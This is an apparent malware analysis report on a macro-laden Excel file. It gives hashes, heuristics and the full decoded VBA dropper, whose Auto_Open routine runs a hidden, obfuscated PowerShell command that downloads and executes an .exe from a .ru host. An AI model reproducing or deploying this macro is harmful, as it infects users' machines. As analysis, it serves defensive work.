Malicious Office (OLE) / .XLS — malware analysis report

Static analysis result for SHA-256 e67f7ae242dffa6b…

MALICIOUS

Office (OLE) / .XLS

Size: 76.5 KB | Created: 2016-12-11 23:43:08 | Authoring application: Microsoft Excel | First seen: 2026-06-19
MD5: dc291fa09317ccd8c6e76bff2d3179e6 | SHA-1: 12efeeeb1452c7ffeec511394193ba02e238021b | SHA-256: e67f7ae242dffa6bdea778de46699b0cf7540e68e9fe375623bbd2fa621c4285
Risk score: 130

Heuristics (5)

  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Shell ehyhgo, vbHide
  • Payload URL assembled from a Chr()/Asc() string expression (1 URL) high OLE_VBA_EXPR_DROPPER_URL
    A VBA macro builds its stage-2 download URL piece by piece from short string literals, often combined with Chr()/Asc()/StrReverse() results, nested (Chr(Asc(Chr(Asc("h")))) is "h") and split across the + and & operators, and sometimes written with Print #n into a second-stage VBScript or PowerShell file rather than executed directly. Because the URL is only assembled at run time it never appears contiguously on disk, and because there is no numeric array to brute-force, both a literal scan and the array recoverers miss it. A bounded expression evaluator resolved it and surfaced it as an IOC. The finding is self-validating: only a syntactically valid host URL that is not already present verbatim in the macro is reported, which rules out the common benign case of a URL that is simply stored as a literal. In this sample the pieces are three-character literals returned by dozens of single-purpose helper functions (memu returns "stm", wapif returns ".ru", ipafuf returns "/12") and concatenated with + inside ehyhgo, whose result is passed straight to Shell.
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub Auto_Open()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://mts2015stm.ru/12122016.exe Referenced by macro

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9533 bytes
SHA-256: e3932f7e181cf1d2209a3ea8a15dd5a28fe09711d6d5a6ff49b253fa41cd4d33
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "tmp12DB"

Function izagvoq()
ypmusarf = "hbonjushoc"
zkirukz = "e^w"
uhisdah = "ibibbikhi"
izagvoq = zkirukz
End Function
Function ukan()
jruvxu = "vuhcyplug"
uzfatu = " hi"
defamso = "xfazuhw"
ukan = uzfatu
End Function
Function luljy()
pisry = "ggero"
bpilcew = "^(^"
idatnyv = "owypusmirp"
luljy = bpilcew
End Function
Function ujzib()
ewuw = "dyxse"
onlaza = ")^."
owqidyp = "orunanrend"
ujzib = onlaza
End Function
Function axupa()
xaqolce = "ivowxoz"
burobz = "a%."
ugsyjj = "izabjirugv"
axupa = burobz
End Function
Function tvapro()
exupy = "qelkobago"
ilxybd = "^m."
wkoby = "yrmyfy"
tvapro = ilxybd
End Function
Function svopyha()
ojylco = "cerdyhd"
imsysj = "h^e"
vmofziq = "fesmepno"
svopyha = imsysj
End Function
Function uzumpoqr()
ejlidmo = "abosoluk"
ubyledc = "^n^"
htutziky = "ekuwuxmo"
uzumpoqr = ubyledc
End Function
Function xipysw()
necijre = "dgoxmaguf"
uwzibw = "w^N"
xuje = "ebqila"
xipysw = uwzibw
End Function
Function baqeb()
adjoxe = "sofqivkorx"
byjhanwy = ".eX"
imtusxyk = "tyknywoghi"
baqeb = byjhanwy
End Function
Function xpigso()
lazjagco = "lhefomlimj"
jtenjadh = "oNp"
mepgojna = "ytecirg"
xpigso = jtenjadh
End Function
Function pedyz()
opihucd = "efuw"
lumetto = "ByP"
esumni = "ijbyjukwycd"
pedyz = lumetto
End Function
Function imjufyj()
kbehetva = "hiqzi"
fopyjm = "015"
atacibf = "ijremi"
imjufyj = fopyjm
End Function
Function memu()
uwkypca = "asqydpuhjew"
mlungo = "stm"
irepqyf = "akuzrugonw"
memu = mlungo
End Function
Function edadi()
uqtagny = "nyzuwdo"
yzeppivk = "lIE"
anximx = "odeqdyf"
edadi = yzeppivk
End Function
Function owlod()
nesors = "ixtexulqu"
oddycre = "-Ex"
rhywefl = "figviqo"
owlod = oddycre
End Function
Function ihuvq()
ohogufx = "raxyspe"
opar = "ocE"
igocogx = "afjuzz"
ihuvq = opar
End Function
Function ecinegp()
ispes = "athiwfop"
likkumzo = "-pr"
kpopgyni = "uvjebzexfu"
ecinegp = likkumzo
End Function
Function mlipsu()
oliky = "umguxoqd"
glezufu = "  ("
ibdyx = "otbyze"
mlipsu = glezufu
End Function
Function qxyci()
apihso = "igjisa"
vfuryrv = "Ol^"
blalpigy = "ivsocu"
qxyci = vfuryrv
End Function
Function ekcuv()
ehicxa = "innijh"
ryrdyda = "Ndo"
yjoh = "iqoxcezid"
ekcuv = ryrdyda
End Function
Function apmujeck()
kavfyro = "nbalylmygk"
uzodtogs = "^lL"
ahijki = "uvipys"
apmujeck = uzodtogs
End Function
Function apucupc()
chincakre = "livoter"
escydju = "T^E"
sompy = "ihcelcumahn"
apucupc = escydju
End Function
Function ankane()
harag = "okanke"
ocojzy = "D^f"
kbuqaqro = "wpovxijudh"
ankane = ocojzy
End Function
Function owipwev()
ydylqer = "ijsuhe"
injecce = "  -"
ukqywy = "qrujaze"
owipwev = injecce
End Function
Function wbylfuhje()
icdobpybb = "vysuto"
fbyhohy = "^s^"
ajaj = "qoqala"
wbylfuhje = fbyhohy
End Function
Function ipafuf()
yhylyn = "alemi"
otcoklo = "/12"
fivah = "ifrickytg"
ipafuf = otcoklo
End Function
Function wapif()
byzlibe = "nivqo"
efokyj = ".ru"
fnalcy = "jridyf"
wapif = efokyj
End Function
Function rharnirc()
vugjopru = "ewefny"
evexiqm = "^  "
zaqqu = "oxupral"
rharnirc = evexiqm
End Function
Function inynci()
cnodo = "tteja"
daxse = "E /"
gakgydo = "omdahqakt"
inynci = daxse
End Function
Function qykxanv()
omypi = "axibewf"
gerode = "-^O"
inbedmi = "icwijmo"
qykxanv = gerode
End Function
Function wado()
oxpar = "elguj"
xoliw = "ROf"
yjluvd = "ygofa"
wado = xoliw
End Function
Function devkany()
izygqanl = "vecu"
egqih = "016"
ugzelme = "muripy"
devkany = egqih
End Function
Function jjizij()
yxgexpy = "vxetbud"
bpaltecru = "a%."
rmahug = "ixjasby"
jjizij = bpaltecru
End Function
Function tmoqqar()
qvogme = "tnisdisojra"
cjohyfu = "^nE"
ehxoth = "ubruffojbi"
tmoqqar = cjohyfu
End Function
Function iweg()
umjyxpe = "fmyslikhuhi"
xvazqet = "^CT"
dorcezg = "azjezx"
iweg = xvazqet
End Function
Function jcurwa()
paski = VarType(ActiveWindow.Caption) = 8
jcurwa = paski
End Function
Function janon()
yzqihmu = "kekqaxqadn"
kobe = "  S"
otop = "ccitjaqo"
janon = kobe
End Function
Function ilgabj()
doxnagi = "hzapatmo"
yhjyt = "app"
qzunyc = "ostejajfy"
ilgabj = yhjyt
End Function
Function yqirhi()
abykwi = "cvefwigoqru"
ibufp = "'ht"
ywcaca = "ylunogtigq"
yqirhi = ibufp
End Function
Function huhbon()
vofxig = "gpunjalr"
lagpumho = "aRt"
insijq = "zwadeqilh"
huhbon = lagpumho
End Function
Function pcajy()
cwodehha = "ufymud"
sobzo = "iLE"
udremxap = "usagaj"
pcajy = sobzo
End Function
Function efyks()
ilfiduk = "wcystogrohu"
wizagzo = "s^S"
khimve = "xlehewa"
efyks = wizagzo
End Function
Function deldyq()
arirqib = "xtulalfu"
fakpin = " '%"
pukcy = "kittymu"
deldyq = fakpin
End Function
Function utvonhyn()
vagyzs = "ryfuqu"
zamnuhta = "   "
tibdy = "kapapu"
utvonhyn = zamnuhta
End Function
Function uvcyqco()
evaga = "gqosdu"
hydmyvre = "apP"
yrarzo = "yngirqo"
uvcyqco = hydmyvre
End Function
Function ixip()
yrul = "dqowav"
axijq = "y^ "
wugufc = "etycivw"
ixip = axijq
End Function
Function yqfobpur()
gduzkaw = "ilanebva"
anpicxer = "tp:"
zapbodki = "homa"
yqfobpur = anpicxer
End Function
Function ihoni()
apyqig = "vejtowha"
aglefav = "T^."
eqom = "ohyqjad"
ihoni = aglefav
End Function
Function apvonku()
ekani = "voqcyx"
fcadymi = "');"
sywyjj = "ovojybxilz"
apvonku = fcadymi
End Function
Function ehyhgo()
efok = "cMD" + ".ex" + inynci + "c """ + "pOw" + "e^r" + wbylfuhje + svopyha + apmujeck + baqeb + "E  " + owlod + "ecu" + "T^i" + xpigso + qxyci + "ic^" + ixip + "   " + pedyz + "as^" + "S  " + owipwev + "NoP" + wado + pcajy + utvonhyn + "-wI" + ekcuv + "wsT" + "yL^" + "e  " + ukan + "Dd^" + "en " + mlipsu + uzumpoqr + izagvoq + qykxanv + "BJE" + iweg + rharnirc + janon + "YS^" + apucupc + tvapro + tmoqqar + ihoni + "wEB" + "^C^" + edadi + "nT^" + ujzib + "dO^" + xipysw + "^Lo" + "^a^" + ankane + "IlE" + luljy + yqirhi + yqfobpur + "//m" + "ts2" + imjufyj + memu + wapif + ipafuf + "122" + devkany + ".ex" + "e'," + "^'%" + uvcyqco + "DAt" + axupa + "exe" + apvonku + "s^t" + huhbon + ecinegp + ihuvq + efyks + deldyq + ilgabj + "dAt" + jjizij + "Exe" + "'"""
ehyhgo = efok
End Function
Sub egihiv()
Dim ukmyq
ukmyq = "uzunu"
If 915 = 38 Then
Dim znotkow
znotkow = "ywuw"
Rem oket ussi owxi
End If
Rem ape okalcotje tpukuwyxhe iftuf
Rem ijge ovno ysxacu ywaxq kzaqwo
If 967 = 617 Then
Rem mamgixjez hgotu
' obinpavpoww kuqekzaja nibaz
End If
' inywok otosbabaf yqma zbinv muzlyp
If 761 = 188 Then
Rem nlemqaml rtytyvxizga jdarnenqa yhybu lvoxheqloca
End If
If "cluru" = "lov" Then
Rem rfign dup ezylpyz
' aroxaxe filsyne
End If

Select Case "exuki"
Case "yhebq"
Dim asurde
asurde = False
' ozjemma uweb
Rem tmahekzo utazo oqnegt ofymryfe mbarefsebd
' aku ofycnep kxirnujqotv ico jilbi cjivd uvixxe
Case "uz"
Rem gijr imom kolqipp ipoxly carjazi xgivbakmi
Case "idaga"
' dlajizdobx ywfugxy bmoqculc ekgusq
End Select
Select Case "ocite"
Case "vy"
Rem sapyfkoma njun ixxavxucba kow iwuxhuq psimynb
' oqzevzuhmyxv ozcupta asy
' jetary
Rem oqeset fpucxaj nnecvudmyfa grumky
Case "ehte"
Dim jeluqz
jeluqz = 9389
Rem rucze faroz plujsejo ezifu cribmehtemo
' ipo
Dim qsetykzi
qsetykzi = True
End Select
Dim qlomwa
qlomwa = #10/14/1981#
Select Case "em"
Case "iwa"
Rem uqkeng
End Select
Dim ykgakkeqf
ykgakkeqf = #9/20/1966#
Dim uwbohi
uwbohi = True
' haduzige bpicy
If "ixor" = "umnex" Then
Rem vgydhi zlidywvad ukide elifb ihpommu fepurcaje
Dim vfuxante
vfuxante = "5432"
End If
Select Case "zoq"
Case "ma"
Dim nynujdy
nynujdy = #7/10/1994#
Rem yvawpawwi iwguju rimc inkomeku foxuqv roski
Dim nbabkico
nbabkico = True
' ibvivfy yviv eqjeb nzyz
Case "nxogpy"
Dim kabi
kabi = "ixy"
Case "bo"
Rem tuwy egenowquqq werisgucsu yjewf acqoskycjy qqiwijujp
Rem kecqurcuq
Dim ydemz
ydemz = "woqsanf"
Dim exult
exult = "3271"
End Select
Select Case "hpa"
Case "cix"
Dim ipkevbu
ipkevbu = "3247"
Rem lydxa ykitzeg pasvyfmakc ajarliku pwalvolu fumtewzil mebfuqnezzu
Rem ilekr wxana utascu umhomk osit cvopuju qawqobypze
Dim uwtivb
uwtivb = "azgivekq"
End Select
If jcurwa Then
Shell ehyhgo, vbHide
End If

End Sub
Sub Auto_Open()
egihiv
End Sub